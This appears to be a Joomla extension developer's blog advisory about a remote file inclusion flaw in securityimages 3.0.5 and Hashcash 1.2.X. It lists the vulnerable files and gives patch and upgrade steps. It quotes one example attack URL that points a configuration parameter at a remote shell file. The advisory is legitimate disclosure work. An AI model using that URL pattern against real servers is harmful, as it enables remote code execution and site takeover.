Joomla Extensions Demo
- Visit the Joomla! 1.5 demo site (end of life in April 2012)
- Visit the Joomla! 2.5 demo site
Support
Do not submit a bug report if you need technical support or have questions.
Forums
Post your suggestions ask for help in the community forums
Contact Me
Missing images/links, any comments, suggestions, need help? Contact me
Download
Skype
Need desperately help?
But dont abuse of it!
But dont abuse of it!
Security risk in securityimages
 | The webmaster of janwiersma.com sent me an email today at 6:12AM , his server was hacked because of a bug in securityimages. This bug allows a remote atacker to execute commands via remote forceful include and execute function on your server and affect ALL version of securityimages <= 3.0.5 Here are all files which put your server at risk: client.php, configinsert.php, lang.php, server.php Example of attack: http://web/components/com_securityimages/ configinsert.php?mosConfig_absolute_path=http://shell.txt from http://securityreason.com/exploitalert/892 Secunia has also a report on it: http://secunia.com/product/11186/ |
| In fact I forget to use that line in these files: defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); This avoid any requests to access directly this file. - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) Please also contact all Your friends which are using securityimages! And for my other components? Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is avalaible! - upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) JoomlaCloud is NOT affected | |
YOU ARE ALL URGE TO UPGRADE ASAP!
You might also like:
363 days ago
Nasty Bug in SecurityImages 5.1.2
Thanks to Margus Pala, a security Flaw has been reported and corrected in SecurityImages version 5
1021 days ago
HOW to make your own patches for securityimages
Just in case I take too much time to deliver a ready to use download, duration 5 minutes, but you ne
1031 days ago
Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.13 Allow login views, login modules, register, lost
1053 days ago
Joomla_1.5.12-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.12 Allow login views, login modules, register, lost
1053 days ago
SecurityImages 5.1.2 available
This version should improve installations on some host, where the plugin securityimages.php did no
1084 days ago
Joomla_1.5.11-Stable-Full_PackageForSecurityImages5.1.1.zip
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.11 Since
1151 days ago
Joomla_1.5.10-Stable-Full_PackageForSecurityImages5.1.1.zip
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.10 Since
1197 days ago
SecurityImages 5.2.0 in active development
Following the Preview of SecurityImages 5.2.0, I am currently developing a proof of concept using th
Category: SecurityImages
Published Date
Hits: 14210
Donations
Thank You for supporting my work
Latest Articles
-
In this series of post I will outline some common techniques to help Joomla extensions development. As you know Jooml... ... -
CedTag has been updated to version 2.5.3 and correct a lot of bugs and contains some nice features. CedTag is t... ... -
CedThumbnails has been updated to version 2.5.5 and contains 1 new features for both Joomla 1.7 and Joomla 2.5. For ex... ... -
CedSmugmug has been updated to version 2.5.2 and correct some bugs and contains some nice features. CedSmugmug&... ... -
If you want an extra gigabyte of storage on your Dropbox account, the online cloud service invites you to compete in i... ...
Subscribe
Latest Comments
Popular Posts
-
HowTo transform your xBox into a Media Center with XBMCXboxMediaCenter is a free open source (GPL) multimedia player for... -
SORRY - 404 File Not Found Error The page you were looking for appears to have been moved, deleted or does not exis... -
African Porcupine against a bull terrier, the bull terrier was not smart enough to stop, and guess how it now look li... -
Add a led to your Xbox to see hard disk activity This mod is quite risky, especially if youcan not solder with precis...
My OSS Projects at
Help Us & Leave Feedback!
- Do you have an excellent article idea you would like to read about here? Share it!
- Do you have some interesting tips how we could improve our site?
- Something missing here? Help us make this blog a better place, leave feedback!
We would love to hear from you!
Be active! Write us now!
WEB 2.0
- Nas-at-home costs storage calculations
- Display structure of website based on their HTML tags
- Browse my sites using tags
- Browse my sites using mind map trees
- My CSS Sprite Generator online
- Scrum Planning Poker Timer